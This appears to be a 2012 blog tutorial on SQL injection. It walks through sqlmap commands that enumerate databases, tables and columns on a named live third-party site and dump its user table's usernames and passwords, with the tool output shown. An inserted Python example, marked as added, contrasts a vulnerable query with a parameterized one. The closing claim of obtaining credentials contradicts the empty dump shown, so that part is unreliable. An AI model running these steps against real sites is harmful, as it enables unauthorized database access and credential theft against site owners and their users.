Nov 30, 2012

Hacking Website Database with SQLmap in Backtrack 5 or Linux OS


All we need is a vulnerable web page. Let's say you have a URL like this

http://www.site.com/section.php?id=51

and that it is prone to SQL injection because the developer of that site did not properly escape the id parameter.

This can be tested simply by trying to open the URL

http://www.site.com/section.php?id=51'

We just added a single quote to the parameter. If this URL throws an error, it is clear that the database reacted with an error because it received an unexpected single quote.
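The single-quote test works because the parameter is pasted straight into the SQL text. The following is an added example, not code from the original post: it uses an in-memory SQLite table (a constructed stand-in for the MySQL backend) and contrasts lookup_vulnerable, which concatenates the id and fails on the probe value, with lookup_parameterized, which binds the value so the quote is treated as data.

```python
import sqlite3

# Constructed stand-in for the table behind section.php?id=...; the post's
# target runs MySQL, but SQLite shows the same parsing behaviour.
ROWS = [(50, "About"), (51, "News")]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE section (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO section VALUES (?, ?)", ROWS)
    return conn

def lookup_vulnerable(conn, raw_id):
    # The unescaped parameter becomes part of the SQL text, so a quote in the
    # value reaches the parser as syntax and the database raises an error.
    sql = "SELECT title FROM section WHERE id = " + raw_id
    return conn.execute(sql).fetchall()

def lookup_parameterized(conn, raw_id):
    # The value is bound to a placeholder; the query text never changes and
    # the quote is just a character in a value that matches no row.
    sql = "SELECT title FROM section WHERE id = ?"
    return conn.execute(sql, (raw_id,)).fetchall()

def probe(lookup, raw_id):
    # Mirrors what the single-quote test observes from outside: ("error", msg)
    # if the database rejected the statement, otherwise ("ok", rows).
    conn = make_db()
    try:
        return ("ok", lookup(conn, raw_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    finally:
        conn.close()

if __name__ == "__main__":
    for raw in ("51", "51'"):
        print("vulnerable    id=%-4s -> %s" % (raw, probe(lookup_vulnerable, raw)))
        print("parameterized id=%-4s -> %s" % (raw, probe(lookup_parameterized, raw)))
```

The vulnerable lookup returns the row for 51 and an error for 51', which is exactly the behaviour the test above relies on; the parameterized lookup returns the row for 51 and an empty result for 51'.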



Step 1 - Finding Databases

python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 --dbs

Output
----------

web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:00:51] [INFO] fetching database names
available databases [2]:
[*] 554777
[*] information_schema

Step 2 - Finding the table names

python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 --tables

Output
----------

web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:01:25] [INFO] fetching tables for database: '554777'
Database: 554777
[6 tables]
+---------------+
| abstract      |
| answer        |
| author        |
| news_details  |
| reporter_list |
| user          |
+---------------+

Step 3 - Finding the columns

python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user --columns

Output
----------

web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:01:48] [INFO] fetching columns for table 'user' in database '554777'
Database: 554777
Table: user
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
| role     | varchar(50) |
| username | varchar(50) |
+----------+-------------+

Step 4 - Finding column values

python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user -C username --dump

Output
----------

Database: 554777
Table: user
[0 entries]
+----------+
| username |
+----------+
+----------+

python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user -C password --dump

Output
----------

Database: 554777
Table: user
[0 entries]
+----------+
| password |
+----------+
+----------+

So we get both the username and the password.